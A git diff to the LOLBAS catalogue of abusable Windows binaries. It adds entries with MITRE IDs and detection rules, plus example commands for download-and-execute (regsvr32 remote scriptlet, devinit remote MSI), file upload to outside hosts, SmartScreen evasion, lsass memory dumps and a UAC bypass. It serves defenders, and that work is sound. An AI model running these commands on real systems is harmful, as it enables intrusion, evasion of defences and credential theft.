diff --git a/NOTICE.md b/NOTICE.md
index 146540e..d9e446d 100644
--- a/NOTICE.md
+++ b/NOTICE.md
@@ -14,7 +14,7 @@
* Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc.
* Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities.
-* OLBAS: Living Off The Land Binaries and Scripts
+* LOLBAS: Living Off The Land Binaries and Scripts
* LOLBIN: Living Off The Land Binary
* LOL/"lol": Living Off The Land
diff --git a/README.md b/README.md
index 457eda3..4167422 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,12 @@
+
+
+ 
+
+ 
+
+ 
+
+
# Living Off The Land Binaries and Scripts (and now also Libraries)
@@ -72,6 +81,7 @@ The following folks help maintain the LOLBAS Project on their personal time:
* Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker))
* Liam ([@liamsomerville](https://twitter.com/liamsomerville))
* Wietze ([@Wietze](https://twitter.com/@Wietze))
+* Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps))
## Thanks
diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/HonorableMentions/GfxDownloadWrapper.yml
similarity index 100%
rename from yml/OSBinaries/GfxDownloadWrapper.yml
rename to yml/HonorableMentions/GfxDownloadWrapper.yml
diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml
index c713172..0396f6b 100644
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@@ -10,14 +10,14 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ OperatingSystem: Windows 10, Windows 11
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
Usecase: Upload
Category: Upload
Privileges: User
MitreID: T1105
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\certreq.exe
- Path: C:\Windows\SysWOW64\certreq.exe
diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml
index 760946a..ee469b2 100644
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@@ -1,7 +1,7 @@
---
Name: Cmd.exe
Description: The command-line interpreter in Windows
-Author: 'Ye Yint Min Thu Htut'
+Author: Ye Yint Min Thu Htut
Created: 2019-06-26
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
@@ -9,7 +9,7 @@ Commands:
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
- MitreID: T1059.003
+ MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmd.exe - < fakefile.doc:payload.bat
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
@@ -18,6 +18,20 @@ Commands:
Privileges: User
MitreID: T1059.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
+ Description: Downloads a specified file from a WebDAV server to the target file.
+ Usecase: Download/copy a file from a WebDAV server
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
+ Description: Uploads a specified file to a WebDAV server.
+ Usecase: Upload a file to a WebDAV server
+ Category: Upload
+ Privileges: User
+ MitreID: T1048.003
+ OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe
@@ -29,6 +43,11 @@ Detection:
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
Resources:
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
+ - Link: https://twitter.com/Mr_0rng/status/1601408154780446721
+ - Link: https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
+ - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type
Acknowledgement:
- Person: r0lan
Handle: '@yeyint_mth'
+ - Person: Mr.0range
+ Handle: '@mr_0rng'
diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml
index cc27bc7..5e095b2 100644
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@@ -11,6 +11,13 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
+ - Command: "conhost.exe --headless calc.exe"
+ Description: Execute calc.exe with conhost.exe as parent process
+ Usecase: Specify --headless parameter to hide child process window (if applicable)
+ Category: Execute
+ Privileges: User
+ MitreID: T1202
+ OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\conhost.exe
Detection:
@@ -19,6 +26,8 @@ Detection:
Resources:
- Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
- Link: https://twitter.com/Wietze/status/1511397781159751680
+ - Link: https://twitter.com/embee_research/status/1559410767564181504
+ - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml
index 4cdace8..94e7e7a 100644
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@@ -14,9 +14,9 @@ Commands:
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
- Category: Execute
+ Category: UAC Bypass
Privileges: Administrator
- MitreID: T1202
+ MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
@@ -26,7 +26,7 @@ Code_Sample:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_uac_bypass_eventvwr.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
- Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
- IOC: eventvwr.exe launching child process other than mmc.exe
diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml
index 0cac39e..d1e025c 100644
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -1,7 +1,7 @@
---
Name: Explorer.exe
Description: Binary used for managing files and system components within Windows
-Author: 'Jai Minton'
+Author: Jai Minton
Created: 2020-06-24
Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
@@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe
-Code_Sample:
- - Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml
new file mode 100644
index 0000000..4ec4118
--- /dev/null
+++ b/yml/OSBinaries/Msedge.yml
@@ -0,0 +1,29 @@
+---
+Name: Msedge.exe
+Description: Microsoft Edge browser
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: msedge.exe https://example.com/file.exe.txt
+ Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
+ Usecase: Download file from the internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+ - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
+ Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
+ Usecase: Download file from the internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
+ - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1478116126005641220
+ - Link: https://twitter.com/mrd0x/status/1478234484881436672
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml
index a501685..7c7c245 100644
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@@ -4,15 +4,24 @@ Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- - Command: odbcconf -f file.rsp
- Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
+ - Command: odbcconf /a {REGSVR c:\test\test.dll}
+ Description: Execute DllREgisterServer from DLL specified.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- - Command: odbcconf /a {REGSVR c:\test\test.dll}
- Description: Execute DllREgisterServer from DLL specified.
+ - Command: |
+ odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
+ odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
+ Description: Install a driver and load the DLL. Requires administrator privileges.
+ Usecase: Execute dll file using technique that can evade defensive counter measures
+ Category: Execute
+ Privileges: User
+ MitreID: T1218.008
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ - Command: odbcconf -f file.rsp
+ Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
@@ -22,7 +31,7 @@ Full_Path:
- Path: C:\Windows\System32\odbcconf.exe
- Path: C:\Windows\SysWOW64\odbcconf.exe
Code_Sample:
- - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
+ - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/58b5eb751379501aa237275f14381f0902e979a5/Archive-Old-Version/OSBinaries/Payload/file.rsp
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_odbcconf.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
@@ -30,7 +39,7 @@ Detection:
Resources:
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
- Link: https://github.com/woanware/application-restriction-bypasses
- - Link: https://twitter.com/Hexacorn/status/1187143326673330176
+ - Link: https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml
index 77b13a0..1f40dfe 100644
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@@ -31,7 +31,8 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
- Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
Resources:
diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml
new file mode 100644
index 0000000..4437afe
--- /dev/null
+++ b/yml/OSBinaries/Runexehelper.yml
@@ -0,0 +1,24 @@
+---
+Name: Runexehelper.exe
+Description: Launcher process
+Author: Grzegorz Tworek
+Created: 2022-12-13
+Commands:
+ - Command: runexehelper.exe c:\windows\system32\calc.exe
+ Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
+ Usecase: Executes arbitrary code
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
+Full_Path:
+ - Path: c:\windows\system32\runexehelper.exe
+Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml
+ - IOC: c:\windows\system32\runexehelper.exe is run
+ - IOC: Existence of runexewithargs_output.txt file
+Resources:
+ - Link: https://twitter.com/0gtweet/status/1206692239839289344
+Acknowledgement:
+ - Person: Grzegorz Tworek
+ Handle: '@0gtweet'
diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml
index 1f51d47..734aba2 100644
--- a/yml/OSBinaries/Setres.yml
+++ b/yml/OSBinaries/Setres.yml
@@ -14,6 +14,7 @@ Commands:
Full_Path:
- Path: c:\windows\system32\setres.exe
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml
- IOC: Unusual location for choice.exe file
- IOC: Process created from choice.com binary
- IOC: Existence of choice.cmd file
diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml
index a026693..3547b46 100644
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@@ -1,4 +1,3 @@
----
Name: ssh.exe
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: 'Akshat Pradhan'
@@ -11,17 +10,21 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
- - Command: ssh localhost calc.exe
- Description: Executes calc.exe.
- Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
- Category: AWL Bypass
+ - Command: ssh -o ProxyCommand=calc.exe .
+ Description: Executes calc.exe from ssh.exe
+ Usecase: Performs execution of specified file, can be used as a defensive evasion.
+ Category: Execute
Privileges: User
- MitreID: T1218
- OperatingSystem: Windows 10 1809, Windows Server 2019
+ MitreID: T1202
+ OperatingSystem: Windows 10
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml
- IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
- IOC: command line arguments specifying execution.
+Resources:
+ - Link: https://gtfobins.github.io/gtfobins/ssh/
Acknowledgement:
- Person: Akshat Pradhan
+ - Person: Felix Boulet
diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml
index 200d450..d05fd20 100644
--- a/yml/OSBinaries/Unregmp2.yml
+++ b/yml/OSBinaries/Unregmp2.yml
@@ -15,6 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml
- IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`
Resources:
- Link: https://twitter.com/notwhickey/status/1466588365336293385
diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml
index a044575..8198d8f 100644
--- a/yml/OSLibraries/Desk.yml
+++ b/yml/OSLibraries/Desk.yml
@@ -22,9 +22,9 @@ Full_Path:
- Path: C:\Windows\System32\desk.cpl
- Path: C:\Windows\SysWOW64\desk.cpl
Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/1d7ee1cd197d3b35508e2a5bf34d9d3b6ca4f504/rules/windows/file/file_event/file_event_win_new_src_file.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
Resources:
- Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt
- Link: https://twitter.com/pabraeken/status/998627081360695297
diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml
index de23bd1..a8a4465 100644
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@@ -32,8 +32,6 @@ Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
Resources:
- Link: https://twitter.com/Oddvarmoe/status/993383596244258816
- Link: https://twitter.com/_st0pp3r_/status/1560072680887525378
diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml
index 8c07903..777d9f7 100644
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@@ -26,6 +26,7 @@ Full_Path:
Code_Sample:
- Code: https://docs.microsoft.com/en-us/windows/win32/winauto/custom-verification-routines
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
- IOC: Sysmon Event ID 1 - Process Creation
- Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
Resources:
diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml
index fc3a135..006c8b4 100644
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -41,7 +41,7 @@ Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
+ - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
- Link: https://twitter.com/nas_bench/status/1534916659676422152
- Link: https://twitter.com/nas_bench/status/1534915321856917506
Acknowledgement:
diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml
index 1af9f88..d9c685a 100644
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -23,6 +23,8 @@ Full_Path:
Code_Sample:
- Code:
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml
Resources:
- Link:
Acknowledgement:
diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml
index 8bfc5fd..c6b1e11 100644
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@@ -1,7 +1,7 @@
---
Name: Cdb.exe
Description: Debugging tool included with Windows Debugging Tools.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
@@ -12,8 +12,8 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
- Command: |
- cdb.exe -pd -pn
- .shell
+ cdb.exe -pd -pn
+ .shell
Description: Attaching to any process and executing shell commands.
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
@@ -41,7 +41,7 @@ Resources:
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
- - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
+ - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
- Link: https://twitter.com/nas_bench/status/1534957360032120833
Acknowledgement:
- Person: Matt Graeber
diff --git a/yml/OtherMSBinaries/Createdump.yml b/yml/OtherMSBinaries/Createdump.yml
index e680d50..e89ae89 100644
--- a/yml/OtherMSBinaries/Createdump.yml
+++ b/yml/OtherMSBinaries/Createdump.yml
@@ -1,8 +1,8 @@
---
Name: Createdump.exe
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
-Author: Daniel Santos
-Created: 2022-08-05
+Author: mr.d0x, Daniel Santos
+Created: 2022-01-20
Commands:
- Command: createdump.exe -n -f dump.dmp [PID]
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
@@ -13,7 +13,12 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+ - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
- IOC: createdump.exe process with a command line containing the lsass.exe process id
Resources:
- Link: https://twitter.com/bopin2020/status/1366400799199272960
diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml
new file mode 100644
index 0000000..6fe7783
--- /dev/null
+++ b/yml/OtherMSBinaries/Devinit.yml
@@ -0,0 +1,21 @@
+---
+Name: Devinit.exe
+Description: Visual Studio 2019 tool
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: devinit.exe run -t msi-install -i https://example.com/out.msi
+ Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
+ Usecase: Executes code from a (remote) MSI file.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218.007
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1460815932402679809
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml
index b202817..1ad14b0 100644
--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
@@ -18,13 +18,20 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
+ - Command: dotnet.exe fsi
+ Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
+ Usecase: Execute arbitrary F# code
+ Category: Execute
+ Privileges: User
+ MitreID: T1059
+ OperatingSystem: Windows 10 and up with .NET SDK installed
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
Category: AWL Bypass
Privileges: User
MitreID: T1218
- OperatingSystem: Windows 10 with .NET Core installed
+ OperatingSystem: Windows 10 and up with .NET Core installed
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
@@ -35,8 +42,11 @@ Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
+ - Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
+ - Person: yamalon
+ Handle: '@mavinject'
diff --git a/yml/OtherMSBinaries/DumpMinitool.yml b/yml/OtherMSBinaries/DumpMinitool.yml
new file mode 100644
index 0000000..127972a
--- /dev/null
+++ b/yml/OtherMSBinaries/DumpMinitool.yml
@@ -0,0 +1,20 @@
+---
+Name: DumpMinitool.exe
+Description: Dump tool part Visual Studio 2022
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
+ Description: Creates a memory dump of the lsass process
+ Usecase: Create memory dump and parse it offline
+ Category: Dump
+ Privileges: Administrator
+ MitreID: T1003.001
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1511415432888131586
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml
index fe18464..7204f81 100644
--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@@ -1,4 +1,3 @@
----
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
@@ -28,6 +27,7 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Fsi.exe execution may be suspicious on non-developer machines
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
